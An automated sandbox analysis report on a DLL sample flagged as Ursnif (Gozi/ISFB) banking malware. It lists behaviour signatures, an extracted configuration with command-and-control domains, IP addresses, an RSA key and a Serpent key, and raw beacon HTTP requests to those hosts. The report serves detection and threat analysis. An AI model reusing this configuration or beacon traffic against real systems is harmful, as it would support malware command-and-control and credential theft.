Windows Analysis Report
hFGZpat9Mf.dll

Overview

General Information

Sample Name: hFGZpat9Mf.dll
Analysis ID: 560543
MD5: 9acde2c3e3a375590a1bc716eabc52c5
SHA1: e231c9ae802a9aad9916f08256f7558f531d54ce
SHA256: 57f997217db22a4d97700768189d44034303e3b15dc08fa48ed6b91bd7051c05
Tags: dll, Gozi, ISFB, Ursnif

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Ursnif
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Writes or reads registry keys via WMI
Found API chain indicative of debugger detection
Machine Learning detection for sample
Found evasive API chain (may stop execution after checking system information)
Sigma detected: Suspicious Call by Ordinal
Writes registry values via WMI
Contains functionality to detect sleep reduction / modifications
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
Contains functionality to record screenshots
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Installs a raw input device (often for capturing keystrokes)
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection

Source: 00000003.00000000.253536439.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Ursnif {"RSA Public Key": "a/OOe3vutyE+gNUF58s+932DNMr8fczoarMUDWqkJsUgObu+3KDuWCwO4VJi2nQNFoXQ13xL3U4zAT7teC979D2YSjTERxwWBeeP0HeZqNq0qcAgYIwsDRVFhGgIWRlndn894LdhC+W8uyATPg1or5n2yZWlh+/NEBJX1nFopQ/z09NIGZPpSgelgd7Gl3dRww5rEsR2WK4eL7TmnaoLNu6StWcVsJ2/hdx1IvAw+0FHXO2OQVeCIyD0YqFOgVX4yIlMXSNJExST4L1Wc5wBukAkkdIxFsm7gsamW82tEhFe2W5TqQV7VVRxRARRhHVoEwzsqj+Q49089Kkixnoy1HXPNrN04rhNhyDNba5DkKY=", "c2_domain": ["config.edge.skype.com", "194.76.226.200", "giporedtrip.at", "habpfans.at", "31.214.157.187"], "botnet": "3000", "server": "50", "serpent_key": "YFyLBjaJo8V90gKm", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
Source: hFGZpat9Mf.dll Virustotal: Detection: 20%
Source: hFGZpat9Mf.dll ReversingLabs: Detection: 32%
Source: http://habpfans.at/drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/VN2ToaIYsZPU/kI1do_2B9jW/Q9gfyv85CoHPvT/SnqcLw3TTcQW61PNrLWiv/_2BkKhdRaMJkT9HD/82Fg3tERnOrn6Yg/fT2SNRr4ih8M1B9lEq/WIX8riitn/8yNrCBKJNgpm3khA4gSx/B8X3zDAJaQCYV1F4k99/jQHMcxYL/Il8wT6lWu/Ih.jlk Avira URL Cloud: Label: malware
Source: http://giporedtrip.at/drew/vDXEGqf4EaI6e/GBZCusNA/wGFZ17UZEew5_2F3lztpfux/SlqAMrP7W1/XBD36Fnf1Eq7wA6HD/bZQhlGWv2oMx/02wZPYg1S9_/2FsBPVVzIGiliu/ZgesoO3_2BU1Itp9mWBBQ/zS9Fa06G7Ifi1Qdi/yVB_2BRlu8Zp_2B/LJtKQv4YtcqH6IAzxR/L6Ho0ZvfB/evXUKtmzU_2B4Fe1cs5B/1wJA25jdSjnKCVAyqP7/xAdhGKLVvM/CvkvXIJYGs/9.jlk Avira URL Cloud: Label: malware
Source: http://habpfans.at/ Avira URL Cloud: Label: malware
Source: http://habpfans.at/drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/w Avira URL Cloud: Label: malware
Source: http://giporedtrip.at/drew/CNAO_2FMqt2bQnnFTS9A/gZCx4lwGHYQjpKz_2Bo/eC3Q_2B6RQnBEorg_2FJk6/uEN67LHG_2FS5/_2BBd1X9/aVPauq0optO45rzbpdCQm0T/aYIRRNsEBo/KjgLaOYvR_2BgwzfQ/25S5OlQYXnss/XWKrlvnyLdL/zvJbW2nKGtMp_2/BhAqVJaOXmJzkoWYA4_2B/1sUQfL4pghiYPQ_2/Bk4zNXCpOm9uy6W/_2FwvvWoJCQywtXfuj/zSz8jbk7z4_2FaKsy/ujc.jlk Avira URL Cloud: Label: malware
Source: http://habpfans.at/drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/wLkUkA7sRnm/cso3yuTSujNtgI/CMmvYVa7e4KaoltzEmBTc/sgUl10rzE9jSORq1/rqqMvEmtzS52b3S/MwqSqUIn0qJ41lN07l/ltNVceIDT/qjCtCMmp_2FbkkqAoDDI/2nZPBTOmmpjaMrj1ust/QMCPjE0wKPGXBQrFS0WE_2/B3SVbiens/K.jlk Avira URL Cloud: Label: malware
Source: http://habpfans.at/drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/ Avira URL Cloud: Label: malware
Source: http://habpfans.at/g Avira URL Cloud: Label: malware
Source: giporedtrip.at Virustotal: Detection: 11%
Source: habpfans.at Virustotal: Detection: 11%
Source: hFGZpat9Mf.dll Joe Sandbox ML: detected
Source: 3.0.rundll32.exe.1080000.3.unpack Avira: Label: TR/Crypt.XPACK.Gen8
Source: 0.2.loaddll32.exe.890184.1.unpack Avira: Label: TR/Kazy.4159236
Source: 3.0.rundll32.exe.ed0184.5.unpack Avira: Label: TR/Kazy.4159236
Source: 3.0.rundll32.exe.ed0184.1.unpack Avira: Label: TR/Kazy.4159236
Source: 3.2.rundll32.exe.1080000.3.unpack Avira: Label: TR/Crypt.XPACK.Gen8
Source: 0.2.loaddll32.exe.9e0000.3.unpack Avira: Label: TR/Crypt.XPACK.Gen8
Source: 3.0.rundll32.exe.1080000.7.unpack Avira: Label: TR/Crypt.XPACK.Gen8
Source: 3.2.rundll32.exe.ed0184.1.unpack Avira: Label: TR/Kazy.4159236

Compliance

Source: hFGZpat9Mf.dll Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000007.00000003.261009852.0000000004A6B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: advapi32.pdbl source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msvcp_win.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: version.pdb` source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mpr.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: setupapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: shcore.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winspool.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: shell32.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: oleaut32.pdbv source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: version.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wsspicli.pdbj source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: powrprof.pdbr source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rundll32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sfc.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: comctl32v582.pdbg source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007053C4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 0_2_007053C4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E153C4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 3_2_00E153C4

Networking

Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49753 -> 13.107.42.16:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49758 -> 194.76.226.200:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49771 -> 211.119.84.112:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49771 -> 211.119.84.112:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49781 -> 41.41.255.235:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49812 -> 31.214.157.187:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49812 -> 31.214.157.187:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49814 -> 13.107.43.16:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49825 -> 181.129.180.251:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49827 -> 61.36.14.230:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49828 -> 31.214.157.187:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49829 -> 13.107.43.16:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49829 -> 13.107.43.16:80
Source: Joe Sandbox View ASN Name: EPMTelecomunicacionesSAESPCO
Source: Joe Sandbox View ASN Name: TE-ASTE-ASEG
Source: Joe Sandbox View IP Address: 181.129.180.251
Source: global traffic HTTP traffic detected:
  GET /drew/ozC7eSUmzahvYkYKrp/EnTXsLZQu/ZxwfzvyOea6Ms_2FcWiK/QVPuXmRecwMBmPtS2pP/K1YuqB0TTP3PJ7dc3csdFA/1Ac_2BGJ3ahfL/ClNkrX58/ZDofYbeDbIVvrUisO8PwbQv/pc3vAH6GWF/x_2B4_2BbH_2B0wxz/YCHkmZmDbaCX/aMf9JRtYupc/_2Ben2gyoQcqJb/gP1jDokjfsnRCuX4LwXIc/R6CnFb_2FUwS1dKT/G7Z9QUvFXshW5HS/y.jlk HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: 194.76.226.200
Source: global traffic HTTP traffic detected:
  GET /drew/CNAO_2FMqt2bQnnFTS9A/gZCx4lwGHYQjpKz_2Bo/eC3Q_2B6RQnBEorg_2FJk6/uEN67LHG_2FS5/_2BBd1X9/aVPauq0optO45rzbpdCQm0T/aYIRRNsEBo/KjgLaOYvR_2BgwzfQ/25S5OlQYXnss/XWKrlvnyLdL/zvJbW2nKGtMp_2/BhAqVJaOXmJzkoWYA4_2B/1sUQfL4pghiYPQ_2/Bk4zNXCpOm9uy6W/_2FwvvWoJCQywtXfuj/zSz8jbk7z4_2FaKsy/ujc.jlk HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: giporedtrip.at
Source: global traffic HTTP traffic detected:
  GET /drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/wLkUkA7sRnm/cso3yuTSujNtgI/CMmvYVa7e4KaoltzEmBTc/sgUl10rzE9jSORq1/rqqMvEmtzS52b3S/MwqSqUIn0qJ41lN07l/ltNVceIDT/qjCtCMmp_2FbkkqAoDDI/2nZPBTOmmpjaMrj1ust/QMCPjE0wKPGXBQrFS0WE_2/B3SVbiens/K.jlk HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: habpfans.at
Source: global traffic HTTP traffic detected:
  GET /drew/n9Q8SXORQfxecr/MW5_2Fu9_2Bgocr6670ju/D1JJTVEHrWL1TxqL/xGoJ_2FQlD36_2B/GkPBzrjzE3l7JBLY9O/1EFPlHsMW/m5HxfuFe9CAmeE3Sv9mV/WruJ_2B6bq6RWMaARg5/48WJvcYD9cWVaImnFjKYnp/qqfI438hlaFuV/Cz10Llo3/y28DCtREPMb5OZnUZKj2hAx/fvbD6E0k2X/xMHWSCI5symguz2Bp/FnCO_2F0QOq8/vwhEVJIxW/5.jlk HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: 31.214.157.187
Source: global traffic HTTP traffic detected:
  GET /drew/t4UXVVFvbg_2F3LXo8gXBT/1icGJdsG14mTA/YOVrBwZF/xARqsNBXczJePkKt2X6ww_2/BWmoPwSUrF/dMkwNYvCaezjn8JBl/H0ytvGxBbW3l/zR2N_2BHrz_/2FvsAN_2FRzTTC/lSSKBusA2w75D7HkZKGJs/DACOMqt0XK0wSfc5/bo0iFsZeiFg2i2l/JDzyY2V7hheHpK0ocJ/ZgcshLwb0/jlOmaQmjqFbHJJo3m7Pt/o4K7mLse1jm/1K47Z.jlk HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: 194.76.226.200
Source: global traffic HTTP traffic detected:
  GET /drew/vDXEGqf4EaI6e/GBZCusNA/wGFZ17UZEew5_2F3lztpfux/SlqAMrP7W1/XBD36Fnf1Eq7wA6HD/bZQhlGWv2oMx/02wZPYg1S9_/2FsBPVVzIGiliu/ZgesoO3_2BU1Itp9mWBBQ/zS9Fa06G7Ifi1Qdi/yVB_2BRlu8Zp_2B/LJtKQv4YtcqH6IAzxR/L6Ho0ZvfB/evXUKtmzU_2B4Fe1cs5B/1wJA25jdSjnKCVAyqP7/xAdhGKLVvM/CvkvXIJYGs/9.jlk HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: giporedtrip.at
Source: global traffic HTTP traffic detected:
  GET /drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/VN2ToaIYsZPU/kI1do_2B9jW/Q9gfyv85CoHPvT/SnqcLw3TTcQW61PNrLWiv/_2BkKhdRaMJkT9HD/82Fg3tERnOrn6Yg/fT2SNRr4ih8M1B9lEq/WIX8riitn/8yNrCBKJNgpm3khA4gSx/B8X3zDAJaQCYV1F4k99/jQHMcxYL/Il8wT6lWu/Ih.jlk HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: habpfans.at
Source: global traffic HTTP traffic detected:
  GET /drew/XdSo6qg_2FEgYysST/WOvXNJFccrJx/zVwG0bEZwA1/FgOrwJqVq8qQMt/gJKBdkHK_2BRbM8cGXljg/dR5mjLhLFYJj3437/sCPrzkqYN8vu4UK/Lv8bHqBMBEjz1n4JUX/xuOm6McxD/U7cQGMW7Bxk_2BVYpR1Y/2dwD1RGZgWHtptGZcjA/6KkSFpd8oqg4xHg9j8CKKi/XQJvRiHHSuj0_/2BwWvoV7/60l_2BahFJ3qIHK1CvN87c7/jOCSFwu.jlk HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: 31.214.157.187
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 26 Jan 2022 16:03:50 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not 
Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 26 Jan 2022 16:04:12 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: closeVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: 